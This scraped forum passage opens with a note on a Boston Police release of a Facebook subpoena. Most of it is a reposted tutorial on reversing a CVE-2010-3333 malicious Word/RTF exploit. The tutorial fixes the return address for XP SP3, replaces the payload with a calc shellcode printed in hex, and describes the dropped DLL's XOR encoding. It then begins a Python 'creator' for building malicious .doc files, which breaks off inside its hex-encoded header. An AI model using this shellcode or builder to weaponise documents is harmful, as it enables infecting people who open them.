includes text printouts of Markoff's wall posts, photos he uploaded as well as photos he was tagged in, a comprehensive list of friends with their Facebook IDs (which we've redacted), and a long table of login and IP data. This document was publicly released by Boston Police as part of the case file. In other case documents, the police have clearly redacted sensitive information. And while the police were evidently comfortable releasing Markoff's unredacted Facebook subpoena, we weren't. Markoff may be dead, but the very-much-alive friends in his friend list were not subpoenaed, and yet their full names and Facebook ID's were part of the document. So we took the additional step of redacting as much identifying information as we could -- knowing that any redaction we performed would be imperfect, but believing that there's a strong argument for distributing this, not only for its value in illustrating the Markoff case, but as a rare window into the shadowy process by which Facebook deals with law enforcement. As far as we can tell, nobody's ever seen what one of these looks like -- and we're hoping the social media, law, and privacy experts out there can glean insight from it: Gasiti aici PDF: http://blog.thephoenix.com/BLOGS/phlog/archive/2012/04/06/when-police-subpoena-your-facebook-information-heres-what-facebook-sends-cops.aspx
  21. Nytro
    Reversing a Malicious Word Document Anonymous January 04, 2013 In this post, I am going to explain in detail how to go about reversing an exploit with which one can easily insert his/her own payload, providing an exploit sample is available. I have taken exploit sample CVE 2010-3333 in order to complete this exercise. So let’s first explore this document (Laden’s Death.doc) to see whether it’s an exploit or not by just looking at it in hex editor. We know that the vulnerability exists in pFragment, so in the given sample we have to find the parameter of pFragment and have to analyze something suspicious. When I opened the document in hex, I found something suspicious as an address in pFragment parameter and that is bc41db77; let’s search this address in debugger (77db41bc): Address not found. That’s why, when I executed this sample, it crashed, as shown in the following picture: Anyway, I am not going to explain the crash analysis here. Our goal is to replace the payload in this exploit with our own payload. But, in brief, it/s crashing because the address used in this exploit sample (77db41bc) is taken from user32.dll of xp sp2, but I am using xp sp3, so this address is not available. It can be made workable on xp sp3, by taking any address from the xp sp3 dll. I took it from kernel 32.dll ‘jmp esp address and replaced it with 7b46867c (jmp esp address of kernel32.dll xp service pack 3). Then it worked fine. When the RTF file is opened, the exploit executes the shell code and drops a file named server.exe inside C:/RECYCLER and executes it. C:/RECYCLER/server.exe does the following: • Drops a file in the system’s temp folder: vmm2.tmp • File vmm2.tmp is renamed and moved to c:\windows\system32\dhcpsrv.dll • Makes registry modifications in an attempt to hijack the DHCP service The payload has the ability to: • Download additional malware • Connect and send sensitive data back to remote servers • Act as a trojan proxy server So let me first analyze the shell code for server.exe, where there are actually two ways to analyze it. 1) In hex editor 2) In debugger Let me open sample in hex editor and try to find the shell code for server.exe. While analyzing in hex we found something suspicious; that is address 7b46867c. This address has been taken from the ntdll file, and the shell code begins from eb10 till eeeeeeeeeeee, as shown in the following figure: at eeeeeeeeeeeee After a deep analysis, we found that the shell code has been encrypted by 8-bit EE XOR, as in the instruction XOR BYTE PTR DS [EDX+ECX], 0EE Also encryption begins from last to start, that is from eeeeeeee to the start of the shell code. Now it’s time to replace the full shell code by your own code. I have the following shell code that will execute calc from our server: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]eb7131c9648b71308b760c8b761c8b5e088b7e208b3666394f1875f2c3608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3e892ffffff5deb05e8f3ffffff89ef83ef8989ee83. [/TD] [/TR] [/TABLE] So I will replace the existing shell code with our own code. After replacing, the sample looks like this: Now, after executing it, it should execute calc. Wow, calc pops up. Now it’s time to analyze the drop dll, which has been dropped into system32 with the name of dhcpsrv.dll. After analyzing, we see that the exploit sample is dropping dhcpsrv.dll in c:\windows\system32 folder, as in picture, and that is going to be executed by rundll32.exe. We will analyze the dropped dll (dhcpsrv.dll) further, but first we have to attach it with debugger. There is a process in attaching debugger. I am going to attach it with WinWord, as it is an Office document file. After attaching and before executing, we have to set a breakpoint (F2) in debugger on various win32 function. Here you will get a clear picture once you reverse two or three samples yourself. I am going to write here the common functions that are desirable to set a breakpoint before reversing. They are: CreateFile, ReadFile, WriteFile, SetFilePointer, LoadLibraryA, LoadLIbrary, etc. After setting a breakpoint, we have to Step Over (F8 ) in debugger and while doing this we will have to look carefully for some suspicious address in the stack windows of debugger (bottom right). We mainly analyze the load library function also and, while analyzing, we look to see if there is any library or any function get loaded by some suspicious address (“suspicious” means an address that does not belong to the kernel ). After a long analysis, we find that the CreateFile function gets loaded at a suspicious address, that is, The CreateFile function gets loaded at the suspicious address (0011f438). A point to be noted is that this address may change from computer to computer. Now our main job should be to find the actual location of the embedded dll/exe, that is the start location of exe/dll, the end location, the size of the embedded exe/dll, and the algorithm by which exe/dll has been encrypted. We will start analyzing line by line from the beginning of the suspicious address. In the above picture, look at the stack windows. There is a call to CreateFileA function from address 0011F438. Now our next work is to start analyzing from this address, so we will set a Break Point at 0011F438. The CreateFile function gets loaded at the suspicious address (0011f438). Note that this address may change from computer to computer. Now our main job should be to find the actual location of the embedded dll/exe, that is start location and end location of exe/dll, and the algorithm by which exe/dll has been encrypted. To do that, we will start analyzing line by line from the beginning of the suspicious address. We find the following instruction: 00115F4E AC LODS BYTE PTR DS : [ESI] 0011F54F 3C 00 CMP AL, 0 0011F551 74 06 JE SHORT 0011F559 0011F553 3C FC CMP AL, 0FC 0011F555 74 02 JE SHORT 0011F559 0011F557 34 FC XOR AL, 0FC 0011F559 AA STOS BYTE PTR ES : [EDI] 0011F55A E2 F2 LOOPD SHORT 0011F54E Let’s look at the two boldfaced instructions: 00115F4E AC LODS BYTE PTR DS : [ESI] This instruction reads the address stored at ESI and stores its value to EAX, while the instruction 0011F559 AA STOS BYTE PTR ES : [EDI] stores the value of EAX to the EDI . So the encryption algorithm is to read each byte of exe; if it is 0 or OFC then leave it as it is, if not then XOR with OFC as in the instruction 0011F557 34 FC XOR AL, 0FC So we found the encryption. The next steps is to find the start, end, and size of the exe. This can be found in a function like SetFilePointer. But in this sample we found this information by doing some manual analysis, as you can see in dump windows: There is some sequence of values with ASCII 6161616161, etc.; let’s search this value in the Hex of the exploit sample: While analyzing in the dump window of the debugger, we found that the decryption starts after }}}} (4 curly braces in dump ), so let’s move into hex to decrypt the value and try to find MZ (as MZ is the start header of the PE file ). If MZ is found, it indicates that this is the beginning of exe. Now what is the total size of exe? For that, we have to check the file that’s dropped into c:/windows/system32 dhcpsrv.dll, open it in the hex editor, and find the total size; this will be the total size of exe/dll. We find the total size of dll is DLL ADD8 in hex, 44504 in decimal. So now we have found: Encryption algorithm Start Location of dll/exe End location of dll/exe Now our main job is to write the creator with proper encryption key and start and end location. That will generate a malicious .doc file. The creator could be written in any scripting language, that is, Python, Perl, etc. I have chosen Python to write the creator, as I explain below. The point where MZ is found is the start point of exe. Anyway, while analyzing this sample, one can get confused about where to insert our own payload. Do keep in the mind that you have to replace the shell code at the server.exe shell code, not at the place where it is dropped in the system32 (dll file ). So now it’s time to write the full creator code that I have written in Python. Here is the full creator: import datetime import os header = ("\x7B\x5C\x72\x74\x66\x31\x5C\x61\x64\x65\x66\x6C\x61\x6E\x67\x31" "\x30\x32\x35\x5C\x61\x6E\x73\x69\x5C\x61\x6E\x73\x69\x63\x70\x67" "\x39\x33\x36\x5C\x75\x63\x32\x5C\x61\x64\x65\x66\x66\x30\x5C\x64" "\x65\x66\x66\x30\x5C\x73\x74\x73\x68\x66\x64\x62\x63\x68\x31\x33" "\x5C\x73\x74\x73\x68\x66\x6C\x6F\x63\x68\x30\x5C\x73\x74\x73\x68" "\x66\x68\x69\x63\x68\x30\x5C\x73\x74\x73\x68\x66\x62\x69\x30\x5C" "\x64\x65\x66\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x64\x65\x66\x6C" "\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x7B\x5C\x66\x6F\x6E\x74\x74" "\x62\x6C\x7B\x5C\x66\x30\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A" "\x5C\x70\x61\x6E\x6F\x73\x65\x20\x30\x32\x30\x32\x30\x36\x30\x33" "\x30\x35\x30\x34\x30\x35\x30\x32\x30\x33\x30\x34\x7D\x54\x69\x6D" "\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x3B\x7D\x7B\x5C" "\x66\x31\x33\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x5C\x27\x63\x62\x5C\x27" "\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x7B\x5C\x2A\x5C\x66\x61" "\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D\x3B\x7D\x0D\x0A\x7B\x5C" "\x66\x33\x36\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x40\x5C\x27\x63\x62\x5C" "\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x3B\x7D\x7B\x5C\x66" "\x33\x37\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73" "\x65\x74\x32\x33\x38\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65" "\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43\x45\x3B\x7D" "\x7B\x5C\x66\x33\x38\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x32\x30\x34\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43" "\x79\x72\x3B\x7D\x7B\x5C\x66\x34\x30\x5C\x66\x72\x6F\x6D\x61\x6E" "\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36\x31\x5C\x66\x70\x72" "\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D" "\x61\x6E\x20\x47\x72\x65\x65\x6B\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34" "\x31\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x36\x32\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73" "\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x54\x75\x72\x3B\x7D" "\x7B\x5C\x66\x34\x32\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x37\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x48\x65\x62\x72\x65\x77\x29\x3B\x7D" "\x7B\x5C\x66\x34\x33\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x38\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x41\x72\x61\x62\x69\x63\x29\x3B\x7D" "\x7B\x5C\x66\x34\x34\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x31\x38\x36\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x42" "\x61\x6C\x74\x69\x63\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34\x35\x5C\x66" "\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36" "\x33\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65" "\x77\x20\x52\x6F\x6D\x61\x6E\x20\x28\x56\x69\x65\x74\x6E\x61\x6D" "\x65\x73\x65\x29\x3B\x7D\x7B\x5C\x66\x31\x36\x39\x5C\x66\x6E\x69" "\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71" "\x32\x20\x53\x69\x6D\x53\x75\x6E\x20\x57\x65\x73\x74\x65\x72\x6E" "\x7B\x5C\x2A\x5C\x66\x61\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D" "\x3B\x7D\x7B\x5C\x66\x33\x39\x39\x5C\x66\x6E\x69\x6C\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x20\x40\x5C" "\x27\x63\x62\x5C\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x20" "\x57\x65\x73\x74\x65\x72\x6E\x3B\x7D\x7D\x7B\x5C\x63\x6F\x6C\x6F" "\x72\x74\x62\x6C\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E" "\x30\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72" "\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65" "\x64\x30\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65" "\x32\x35\x35\x3B\x0D\x0A\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65" "\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32" "\x35\x35\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35" "\x35\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x30" "\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67" "\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72" "\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62" "\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65" "\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64" "\x30\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x31" "\x32\x38\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E\x31\x32" "\x38\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C" "\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C" "\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C" "\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65" "\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x30\x3B\x0D\x0A\x5C\x72\x65" "\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C" "\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64\x31\x39\x32\x5C\x67\x72" "\x65\x65\x6E\x31\x39\x32\x5C\x62\x6C\x75\x65\x31\x39\x32\x3B\x7D" "\x7B\x5C\x73\x74\x79\x6C\x65\x73\x68\x65\x65\x74\x7B\x5C\x71\x6A" "\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C\x6E\x6F\x77\x69\x64\x63" "\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C" "\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75" "\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72" "\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69" "\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32\x34\x5C\x61\x6C\x61\x6E" "\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C\x6C\x61\x6E\x67\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x5C\x6B\x65" "\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63\x68\x5C\x66\x30\x5C\x68" "\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63\x68\x5C\x61\x66\x31" "\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C\x61\x6E\x67\x6E\x70\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x6E\x70\x32\x30\x35\x32\x20" "\x5C\x73\x6E\x65\x78\x74\x30\x20\x4E\x6F\x72\x6D\x61\x6C\x3B\x7D" "\x7B\x5C\x2A\x5C\x63\x73\x31\x30\x20\x5C\x61\x64\x64\x69\x74\x69" "\x76\x65\x20\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20" "\x44\x65\x66\x61\x75\x6C\x74\x20\x50\x61\x72\x61\x67\x72\x61\x70" "\x68\x20\x46\x6F\x6E\x74\x3B\x7D\x7B\x5C\x2A\x0D\x0A\x5C\x74\x73" "\x31\x31\x5C\x74\x73\x72\x6F\x77\x64\x5C\x74\x72\x66\x74\x73\x57" "\x69\x64\x74\x68\x42\x33\x5C\x74\x72\x70\x61\x64\x64\x6C\x31\x30" "\x38\x5C\x74\x72\x70\x61\x64\x64\x72\x31\x30\x38\x5C\x74\x72\x70" "\x61\x64\x64\x66\x6C\x33\x5C\x74\x72\x70\x61\x64\x64\x66\x74\x33" "\x5C\x74\x72\x70\x61\x64\x64\x66\x62\x33\x5C\x74\x72\x70\x61\x64" "\x64\x66\x72\x33\x5C\x74\x72\x63\x62\x70\x61\x74\x31\x5C\x74\x72" "\x63\x66\x70\x61\x74\x31\x5C\x74\x62\x6C\x69\x6E\x64\x30\x5C\x74" "\x62\x6C\x69\x6E\x64\x74\x79\x70\x65\x33\x5C\x74\x73\x63\x65\x6C" "\x6C\x77\x69\x64\x74\x68\x66\x74\x73\x30\x5C\x74\x73\x76\x65\x72" "\x74\x61\x6C\x74\x5C\x74\x73\x62\x72\x64\x72\x74\x5C\x74\x73\x62" "\x72\x64\x72\x6C\x5C\x74\x73\x62\x72\x64\x72\x62\x5C\x74\x73\x62" "\x72\x64\x72\x72\x5C\x74\x73\x62\x72\x64\x72\x64\x67\x6C\x5C\x74" "\x73\x62\x72\x64\x72\x64\x67\x72\x5C\x74\x73\x62\x72\x64\x72\x68" "\x5C\x74\x73\x62\x72\x64\x72\x76\x20\x0D\x0A\x5C\x71\x6C\x20\x5C" "\x6C\x69\x30\x5C\x72\x69\x30\x5C\x77\x69\x64\x63\x74\x6C\x70\x61" "\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73" "\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61" "\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74" "\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30" "\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66" "\x30\x5C\x61\x66\x73\x32\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66" "\x63\x73\x30\x20\x5C\x66\x73\x32\x30\x5C\x6C\x61\x6E\x67\x31\x30" "\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65\x31\x30\x32\x34\x5C\x6C\x6F" "\x63\x68\x5C\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x31\x30\x32\x34\x20\x5C\x73\x6E\x65\x78\x74\x31\x31\x20" "\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20\x4E\x6F\x72" "\x6D\x61\x6C\x20\x54\x61\x62\x6C\x65\x3B\x7D\x7D\x0D\x0A\x7B\x5C" "\x2A\x5C\x6C\x61\x74\x65\x6E\x74\x73\x74\x79\x6C\x65\x73\x5C\x6C" "\x73\x64\x73\x74\x69\x6D\x61\x78\x31\x35\x36\x5C\x6C\x73\x64\x6C" "\x6F\x63\x6B\x65\x64\x64\x65\x66\x30\x7D\x7B\x5C\x2A\x5C\x72\x73" "\x69\x64\x74\x62\x6C\x20\x5C\x72\x73\x69\x64\x31\x35\x38\x30\x37" "\x35\x31\x39\x7D\x7B\x5C\x2A\x5C\x67\x65\x6E\x65\x72\x61\x74\x6F" "\x72\x20\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x57\x6F\x72\x64" "\x20\x31\x31\x2E\x30\x2E\x30\x30\x30\x30\x3B\x7D\x7B\x5C\x69\x6E" "\x66\x6F\x7B\x5C\x74\x69\x74\x6C\x65\x20\x46\x66\x66\x66\x66\x66" "\x66\x66\x66\x7D\x7B\x5C\x61\x75\x74\x68\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x6F\x70\x65\x72\x61\x74\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x63\x72\x65\x61\x74\x69\x6D\x5C\x79\x72\x32\x30" "\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C\x68\x72\x31\x34" "\x5C\x6D\x69\x6E\x35\x30\x7D\x7B\x5C\x72\x65\x76\x74\x69\x6D\x5C" "\x79\x72\x32\x30\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C" "\x68\x72\x31\x34\x5C\x6D\x69\x6E\x35\x31\x7D\x7B\x5C\x76\x65\x72" "\x73\x69\x6F\x6E\x31\x7D\x0D\x0A\x7B\x5C\x65\x64\x6D\x69\x6E\x73" "\x31\x7D\x7B\x5C\x6E\x6F\x66\x70\x61\x67\x65\x73\x31\x7D\x7B\x5C" "\x6E\x6F\x66\x77\x6F\x72\x64\x73\x31\x7D\x7B\x5C\x6E\x6F\x66\x63" "\x68\x61\x72\x73\x39\x7D\x7B\x5C\x2A\x5C\x63\x6F\x6D\x70\x61\x6E" "\x79\x20\x43\x48\x49\x4E\x41\x7D\x7B\x5C\x6E\x6F\x66\x63\x68\x61" "\x72\x73\x77\x73\x39\x7D\x7B\x5C\x76\x65\x72\x6E\x32\x34\x36\x31" "\x33\x7D\x7B\x5C\x2A\x5C\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x30" "\x30\x30\x30\x30\x30\x30\x30\x7D\x7D\x7B\x5C\x2A\x5C\x78\x6D\x6C" "\x6E\x73\x74\x62\x6C\x20\x7B\x5C\x78\x6D\x6C\x6E\x73\x31\x20\x68" "\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x6D\x69" "\x63\x72\x6F\x73\x6F\x66\x74\x2E\x63\x6F\x6D\x2F\x6F\x66\x66\x69" "\x63\x65\x2F\x77\x6F\x72\x64\x2F\x32\x30\x30\x33\x2F\x77\x6F\x72" "\x64\x6D\x6C\x7D\x7D\x0D\x0A\x5C\x70\x61\x70\x65\x72\x77\x31\x31" "\x39\x30\x36\x5C\x70\x61\x70\x65\x72\x68\x31\x36\x38\x33\x38\x5C" "\x6D\x61\x72\x67\x6C\x31\x38\x30\x30\x5C\x6D\x61\x72\x67\x72\x31" "\x38\x30\x30\x5C\x6D\x61\x72\x67\x74\x31\x34\x34\x30\x5C\x6D\x61" "\x72\x67\x62\x31\x34\x34\x30\x5C\x67\x75\x74\x74\x65\x72\x30\x5C" "\x6C\x74\x72\x73\x65\x63\x74\x20\x0D\x0A\x5C\x64\x65\x66\x74\x61" "\x62\x34\x32\x30\x5C\x66\x74\x6E\x62\x6A\x5C\x61\x65\x6E\x64\x64" "\x6F\x63\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64\x73\x79\x73" "\x66\x6F\x6E\x74\x31\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64" "\x6C\x69\x6E\x67\x64\x61\x74\x61\x30\x5C\x67\x72\x66\x64\x6F\x63" "\x65\x76\x65\x6E\x74\x73\x30\x5C\x76\x61\x6C\x69\x64\x61\x74\x65" "\x78\x6D\x6C\x31\x5C\x73\x68\x6F\x77\x70\x6C\x61\x63\x65\x68\x6F" "\x6C\x64\x74\x65\x78\x74\x30\x5C\x69\x67\x6E\x6F\x72\x65\x6D\x69" "\x78\x65\x64\x63\x6F\x6E\x74\x65\x6E\x74\x30\x5C\x73\x61\x76\x65" "\x69\x6E\x76\x61\x6C\x69\x64\x78\x6D\x6C\x30\x5C\x73\x68\x6F\x77" "\x78\x6D\x6C\x65\x72\x72\x6F\x72\x73\x31\x5C\x66\x6F\x72\x6D\x73" "\x68\x61\x64\x65\x5C\x68\x6F\x72\x7A\x64\x6F\x63\x5C\x64\x67\x6D" "\x61\x72\x67\x69\x6E\x5C\x64\x67\x68\x73\x70\x61\x63\x65\x31\x38" "\x30\x5C\x64\x67\x76\x73\x70\x61\x63\x65\x31\x35\x36\x5C\x64\x67" "\x68\x6F\x72\x69\x67\x69\x6E\x31\x38\x30\x30\x5C\x64\x67\x76\x6F" "\x72\x69\x67\x69\x6E\x31\x34\x34\x30\x5C\x64\x67\x68\x73\x68\x6F" "\x77\x30\x0D\x0A\x5C\x64\x67\x76\x73\x68\x6F\x77\x32\x5C\x6A\x63" "\x6F\x6D\x70\x72\x65\x73\x73\x5C\x6C\x6E\x6F\x6E\x67\x72\x69\x64" "\x5C\x76\x69\x65\x77\x6B\x69\x6E\x64\x31\x5C\x76\x69\x65\x77\x73" "\x63\x61\x6C\x65\x31\x30\x30\x5C\x73\x70\x6C\x79\x74\x77\x6E\x69" "\x6E\x65\x5C\x66\x74\x6E\x6C\x79\x74\x77\x6E\x69\x6E\x65\x5C\x68" "\x74\x6D\x61\x75\x74\x73\x70\x5C\x75\x73\x65\x6C\x74\x62\x61\x6C" "\x6E\x5C\x61\x6C\x6E\x74\x62\x6C\x69\x6E\x64\x5C\x6C\x79\x74\x63" "\x61\x6C\x63\x74\x62\x6C\x77\x64\x5C\x6C\x79\x74\x74\x62\x6C\x72" "\x74\x67\x72\x5C\x6C\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x6E\x6F" "\x62\x72\x6B\x77\x72\x70\x74\x62\x6C\x5C\x76\x69\x65\x77\x6E\x6F" "\x62\x6F\x75\x6E\x64\x31\x5C\x73\x6E\x61\x70\x74\x6F\x67\x72\x69" "\x64\x69\x6E\x63\x65\x6C\x6C\x5C\x61\x6C\x6C\x6F\x77\x66\x69\x65" "\x6C\x64\x65\x6E\x64\x73\x65\x6C\x5C\x77\x72\x70\x70\x75\x6E\x63" "\x74\x5C\x61\x73\x69\x61\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x72" "\x73\x69\x64\x72\x6F\x6F\x74\x31\x35\x38\x30\x37\x35\x31\x39\x0D" "\x0A\x5C\x6E\x65\x77\x74\x62\x6C\x73\x74\x79\x72\x75\x6C\x73\x5C" "\x6E\x6F\x67\x72\x6F\x77\x61\x75\x74\x6F\x66\x69\x74\x20\x7B\x5C" "\x2A\x5C\x66\x63\x68\x61\x72\x73\x20\x0D\x0A\x21\x29\x2C\x2E\x3A" "\x5C\x27\x33\x62\x3F\x5D\x5C\x27\x37\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x37\x5C\x27\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27" "\x61\x36\x5C\x27\x61\x31\x5C\x27\x61\x35\x5C\x27\x61\x38\x5C\x27" "\x34\x34\x5C\x27\x61\x31\x5C\x27\x61\x63\x5C\x27\x61\x31\x5C\x27" "\x61\x66\x5C\x27\x61\x31\x5C\x27\x62\x31\x5C\x27\x61\x31\x5C\x27" "\x61\x64\x5C\x27\x61\x31\x5C\x27\x63\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x32\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x38\x5C\x27\x61\x31\x5C\x27\x61\x39\x5C\x27\x61\x31\x5C\x27" "\x62\x35\x5C\x27\x61\x31\x5C\x27\x62\x37\x5C\x27\x61\x31\x5C\x27" "\x62\x39\x5C\x27\x61\x31\x5C\x27\x62\x62\x5C\x27\x61\x31\x5C\x27" "\x62\x66\x5C\x27\x61\x31\x5C\x27\x62\x33\x5C\x27\x61\x31\x5C\x27" "\x62\x64\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27" "\x61\x32\x5C\x27\x61\x33\x5C\x27\x61\x37\x5C\x27\x61\x33\x5C\x27" 